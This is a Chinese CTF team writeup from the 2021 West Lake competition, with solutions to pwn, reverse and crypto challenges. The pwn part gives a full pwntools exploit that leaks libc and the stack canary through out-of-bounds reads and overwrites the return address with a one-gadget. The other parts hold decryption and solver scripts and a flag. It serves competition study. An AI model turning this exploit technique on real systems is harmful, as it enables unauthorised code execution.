2021 西湖论剑部分题目 Writeup xp0int Posted on Nov 23 2021 西湖论剑 2021 Writeup By Xp0int ## 1. Pwn ### 1.1 string_go `Author: c1ark` 实现了一个简单的计算器,输入计算表达式得到的结果为3就可以进入存在栈溢出漏洞的函数,然后利用数组越界泄露libc和canary,劫持返回地址为onegadget。 from pwn import * context(os='linux', arch='amd64',log_level='debug') context.terminal =['tmux', 'splitw', '-h'] p=remote("82.157.20.104",56700) #p = gdb.debug("./string_go") #p=process("./string_go") se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) rc = lambda numb=4096 :p.recv(numb) ru = lambda delims :p.recvuntil(delims) uu32 = lambda data :u32(data.ljust(4, '\x00')) uu64 = lambda data :u64(data.ljust(8, '\x00')) info_addr = lambda tag, addr :p.success(tag + ': {:#x}'.format(addr)) def debug(): gdb.attach(p) p.interactive() def debug_pause(): gdb.attach(p) pause() sla(">>> ","1+2") sla(">>> ","-8") sla(">>> ","a"*0x8) sla(">>> ","\x40") stack_addr = u64(ru("\x7f")[-6:].ljust(8,"\x00")) info_addr("stack_addr",stack_addr) libc_addr = u64(ru("\x7f")[-6:].ljust(8,"\x00")) libc_base = libc_addr - 0x730157 info_addr("libc_base",libc_base) rc(10) canary = u64(rc(8)) info_addr("canary",canary) # onegadget p64(libc_base+0x4f3d5) payload = p64(0)*3+p64(canary)+p64(0)*3 + p64(libc_base+0x4f3d5) sla(">>> ",payload) p.interactive() flag值: DASCTF{25961f8592eb28365aeafa836225285b} ## 2. Reverse ### 2.1 Tactical Armed `Author: cew` 魔改tea,sum是累积的,delta也改过 ``` void decrypt(uint32_t v[2], const uint32_t k[4], uint32_t* out, uint32_t round, uint32_t *ddd) { uint32_t v0 = v[0], v1 = v[1], sum = *ddd, i; /* set up; sum is (delta << 5) & 0xFFFFFFFF */ uint32_t delta = 0x81a5692e; /* a key schedule constant */ for (int i = 0; i < round; i++) { sum += delta; } *ddd = sum; uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3]; /* cache key */ for (i = 0; i < round; i++) { /* basic cycle start */ v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3); v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1); sum -= delta; } /* end cycle */ out[0] = v0; out[1] = v1; } int main(){ uint32_t key[4] = { 0x7CE45630, 0x58334908, 0x66398867, 0x0C35195B1 }; uint32_t enc[11] = { 1110384109, 344319090, 55933141, 3211493538, 2547479109, 766408145, 1717545315, 690908532, 2543189185, 196462825, 0 }; uint32_t out[11] = { 0 }; /*for (int round = 0; round < 128; round++) { for (int i = 0; i < 10; i += 2) { decrypt(enc + i, key, out + i, round); } printf("%d -> 0x%08x\n", round, out[0]); }*/ uint32_t ddd = 0; for (int i = 0; i < 10; i += 2) { decrypt(enc + i, key, out + i, 33, &ddd); } printf("%s", (char*)out); } ``` ### 2.2 gghdl `Author: cew` c调用vhdl,怎么操作的着实看不懂,但是动调可以发现就是把输入一一置换然后与常值比较 ``` 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202020303020303 0x810e5e8: 0x0302030302030203 0x810fec8: 0x0302030303020303 0x810e5e8: 0x0203030302030203 0x810fec8: 0x0303030302020303 0x810e5e8: 0x0303030302030203 0x810fec8: 0x0303030303020303 0x810e5e8: 0x0202020302030203 0x810fec8: 0x0202020302020303 0x810e5e8: 0x0302020302030203 0x810fec8: 0x0203020303020303 0x810e5e8: 0x0203020302030203 0x810fec8: 0x0303030202030303 0x810e5e8: 0x0303020302030203 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0202030202030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0302030202030203 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0302030303030303 0x810fec8: 0x0302030202030203 0x810e5e8: 0x0203030303030303 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0303030303030303 0x810fec8: 0x0302030202030203 0x810e5e8: 0x0202020303030303 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0302020303030303 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0203020303030303 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0303020303030303 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0202030203030303 0x810fec8: 0x0203030303030303 0x810e5e8: 0x0302030203030303 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0203030203030303 0x810fec8: 0x0202020303030303 0x810e5e8: 0x0303030203030303 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202020203030303 0x810fec8: 0x0202020302030203 0x810e5e8: 0x0302020203030303 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0203020203030303 0x810fec8: 0x0303030303030303 0x810e5e8: 0x0303020203030303 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202030302030303 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0302030302030303 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0203030302030303 0x810fec8: 0x0303030302030203 0x810e5e8: 0x0303030302030303 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0202020302030303 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0302020302030303 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0203020302030303 0x810fec8: 0x0203020303030303 0x810e5e8: 0x0303020302030303 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0202030202030303 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0302030202030303 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0203030202030303 0x810fec8: 0x0203030303030303 0x810e5e8: 0x0302030303020303 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0203030303020303 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0303030303020303 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0202020303020303 0x810fec8: 0x0202020302030203 0x810e5e8: 0x0302020303020303 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0203020303020303 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0303020303020303 0x810fec8: 0x0303030303030303 0x810e5e8: 0x0202030203020303 0x810fec8: 0x0302020202030303 0x810e5e8: 0x0302030203020303 0x810fec8: 0x0202020303020303 0x810e5e8: 0x0203030203020303 0x810fec8: 0x0302030303020303 0x810e5e8: 0x0303030203020303 0x810fec8: 0x0303030302020303 0x810e5e8: 0x0202020203020303 0x810fec8: 0x0303030303020303 0x810e5e8: 0x0302020203020303 0x810fec8: 0x0202020302020303 0x810e5e8: 0x0203020203020303 0x810fec8: 0x0203020303020303 0x810e5e8: 0x0303020203020303 0x810fec8: 0x0303030202030303 0x810e5e8: 0x0202030302020303 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0302030302020303 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0203030302020303 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0303030302020303 0x810fec8: 0x0302030202030203 0x810e5e8: 0x0202020302020303 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0302020302020303 0x810fec8: 0x0302030202030203 0x810e5e8: 0x0203020302020303 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0303020302020303 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0202030202020303 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0302030202020303 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0203030202020303 0x810fec8: 0x0203030303030303 0x810e5e8: 0x0302030303030203 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0203030303030203 0x810fec8: 0x0202020303030303 0x810e5e8: 0x0303030303030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202020303030203 0x810fec8: 0x0202020302030203 0x810e5e8: 0x0202030303030203 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0302020303030203 0x810fec8: 0x0303030303030303 0x810e5e8: 0x0203020303030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0303020303030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202030203030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0302030203030203 0x810fec8: 0x0303030302030203 0x810e5e8: 0x0203030203030203 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0303030203030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202020203030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0302020203030203 0x810fec8: 0x0203020303030303 0x810e5e8: 0x0203020203030203 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0303020203030203 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0203030202030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0303030202030203 0x810fec8: 0x0203030303030303 0x810e5e8: 0x0202020202030203 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0302020202030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0203020202030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0303020202030203 0x810fec8: 0x0202020302030203 0x810e5e8: 0x0202030303020303 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0303030202020303 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0202020202020303 0x810fec8: 0x0303030303030303 0x810e5e8: 0x0302020202020303 0x810fec8: 0x0302020202030303 0x810e5e8: 0x0203020202020303 0x810fec8: 0x0202020303020303 0x810e5e8: 0x0303020202020303 0x810fec8: 0x0302030303020303 0x810e5e8: 0x0202030303030303 0x810fec8: 0x0303030302020303 0x810e5e8: 0x0303030202030303 0x810fec8: 0x0303030303020303 0x810e5e8: 0x0202020202030303 0x810fec8: 0x0202020302020303 0x810e5e8: 0x0302020202030303 0x810fec8: 0x0203020303020303 0x810e5e8: 0x0203020202030303 0x810fec8: 0x0303030202030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202020303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202020302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0303030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0303030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203020303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202020302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0303030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302020202030303 ``` ``` # ghdl.txt 就是上面的数据 f = open("ghdl.txt", "r").readlines() cmp = [] test = list("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$ %&'()*+,-./:;<=>?@[\\]^_`{|}~0000000000000000000000000000000000000") dic = {} for i in range(0, len(f), 2): # print(f[i], f[i+1]) inin = f[i].strip().split(' ')[1] cmpcmp = f[i+1].strip().split(' ')[1] cmp.append(cmpcmp) dic[inin] = test[i // 2] assert len(cmp) == len(test) print(dic) for i in range(len(cmp)): val = cmp[i] try: print(dic[val], end='') except: print('?',end='') ``` ### 2.3 ROR `Author: cew` 每8字节一组,取每字节的1个比特位组成1字节,每8字节就生成了8字节的数据,反着推就行 ``` cmp = [101, 85, 36, 54, 157, 113, 184, 200, 101, 251, 135, 127, 154, 156, 177, 223, 101, 143, 157, 57, 143, 17, 246, 142, 101, 66, 218, 180, 140, 57, 251, 153, 101, 72, 106, 202, 99, 231, 164, 121] mmm = [101, 8, 247, 18, 188, 195, 207, 184, 131, 123, 2, 213, 52, 189, 159, 51, 119, 118, 212, 215, 235, 144, 137, 94, 84, 1, 125, 244, 17, 255, 153, 73, 173, 87, 70, 103, 42, 157, 127, 210, 225, 33, 139, 29, 90, 145, 56, 148, 249, 12, 0, 202, 232, 203, 95, 25, 246, 240, 60, 222, 218, 234, 156, 20, 117, 164, 13, 37, 88, 252, 68, 134, 5, 107, 67, 154, 109, 209, 99, 152, 104, 45, 82, 61, 221, 136, 214, 208, 162, 237, 165, 59, 69, 62, 242, 34, 6, 243, 26, 168, 9, 220, 124, 75, 92, 30, 161, 176, 113, 4, 226, 155, 183, 16, 78, 22, 35, 130, 86, 216, 97, 180, 36, 126, 135, 248, 10, 19, 227, 228, 230, 28, 53, 44, 177, 236, 147, 102, 3, 169, 149, 187, 211, 81, 57, 231, 201, 206, 41, 114, 71, 108, 112, 21, 223, 217, 23, 116, 63, 98, 205, 65, 7, 115, 83, 133, 49, 138, 48, 170, 172, 46, 163, 80, 122, 181, 142, 105, 31, 106, 151, 85, 58, 178, 89, 171, 224, 40, 192, 179, 190, 204, 198, 43, 91, 146, 238, 96, 32, 132, 77, 15, 38, 74, 72, 11, 54, 128, 93, 111, 76, 185, 129, 150, 50, 253, 64, 141, 39, 193, 120, 79, 121, 200, 14, 140, 229, 158, 174, 191, 239, 66, 197, 175, 160, 194, 250, 199, 182, 219, 24, 196, 166, 254, 233, 245, 110, 100, 47, 241, 27, 251, 186, 167, 55, 143] idx = [] for val in cmp: idx.append(mmm.index(val)) for i in range(0, len(idx), 8): cur = idx[i:i+8] cur = [bin(_)[2:].rjust(8, '0') for _ in cur] for j in range(8): sss = "" for k in range(8): sss += cur[k][j] print(chr(int(sss, 2)), end='') ``` ### 2.4 虚假的粉丝 `Author: cew` 300分的签到题。。。根据elf的限制条件找到ASCII-faded 4157.txt 1118 83,key1 = 4157, key2 = 1118,key3 = 83 然后base64解码UzNDcmU3X0szeSUyMCUzRCUyMEFsNE5fd0FsSzNS -> S3Cre7_K3y%20%3D%20Al4N_wAlK3R得到key:Al4N_wAlK3R,然后就让程序一直运行到结束得到flag ``` import os files = os.listdir("./f/") for file in files: s = open("./f/" + file, "rb").read() s = list(s) try: idx = s.index(ord('U')) while s[idx+39] != ord('S'): idx = s.index(ord('U'), idx+1) print(file, idx, s[idx+39]) except: continue ```  ## 3. Crypto ### 3.1 密码人集合 `Author: cew` 网上解数独脚本改一改一把梭 ``` from pwn import * context.log_level = 'debug' class solution(object): def __init__(self,board): self.b = board self.t = 0 def check(self,x,y,value):#检查每行每列及每宫是否有相同项 for row_item in self.b[x]: if row_item == value: return False for row_all in self.b: if row_all[y] == value: return False row,col=x//3*3,y//3*3 row3col3=self.b[row][col:col+3]+self.b[row+1][col:col+3]+self.b[row+2][col:col+3] for row3col3_item in row3col3: if row3col3_item == value: return False return True def get_next(self,x,y):#得到下一个未填项 for next_soulu in range(y+1,9): if self.b[x][next_soulu] == 0: return x,next_soulu for row_n in range(x+1,9): for col_n in range(0,9): if self.b[row_n][col_n] == 0: return row_n,col_n return -1,-1 #若无下一个未填项,返回-1 def try_it(self,x,y):#主循环 if self.b[x][y] == 0: for i in range(1,10):#从1到9尝试 self.t+=1 if self.check(x,y,i):#符合 行列宫均无条件 的 self.b[x][y]=i #将符合条件的填入0格 next_x,next_y=self.get_next(x,y)#得到下一个0格 if next_x == -1: #如果无下一个0格 return True #返回True else: #如果有下一个0格,递归判断下一个0格直到填满数独 end=self.try_it(next_x,next_y) if not end: #在递归过程中存在不符合条件的,即 使try_it函数返回None的项 self.b[x][y] = 0 #回朔到上一层继续 else: return True def start(self): begin = datetime.datetime.now() if self.b[0][0] == 0: self.try_it(0,0) else: x,y=self.get_next(0,0) self.try_it(x,y) for i in self.b: print(i) end = datetime.datetime.now() return self.b sss = "西湖论剑我要拿第一" dic = {} rev_dic = {} for i in range(9): dic[sss[i]] = i+1 rev_dic[i+1] = sss[i] # print(dic) # conn = remote("82.157.25.233", 30900) # conn.recvuntil("------------------------------\n") line = '''* * * | * * 剑 | * * 要 * * * | * 拿 要 | * * 我 我 要 * | * * * | * * * * * * | * 第 我 | * * * * 拿 * | 要 * 湖 | * * * * * * | 拿 * * | * * * * * 论 | 湖 * * | 要 * * 拿 * * | * * * | * * * 西 * * | * 一 拿 | 湖 * *'''.split('\n') # for i in range(3): # for i in range(3): # line.append(conn.recvuntil('\n').decode()) # conn.recvuntil('\n') mat = [] for i in range(9): line[i] = line[i].strip().replace('| ', '').split(' ') tmp = [] for ch in line[i]: if ch != '': if ch == '*': tmp.append(0) else: tmp.append(dic[ch]) mat.append(tmp) print(mat) s = solution(mat) res = s.start() sendddd = "" for i in range(9): for j in range(9): sendddd += rev_dic[res[i][j]] print(sendddd) # conn.sendline(sendddd) # conn.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay 2021 暨南大学 Xp0int 杯网络安全大赛 Writeup 2021 第五空间 Writeup By Xp0int
没有帐号? 立即注册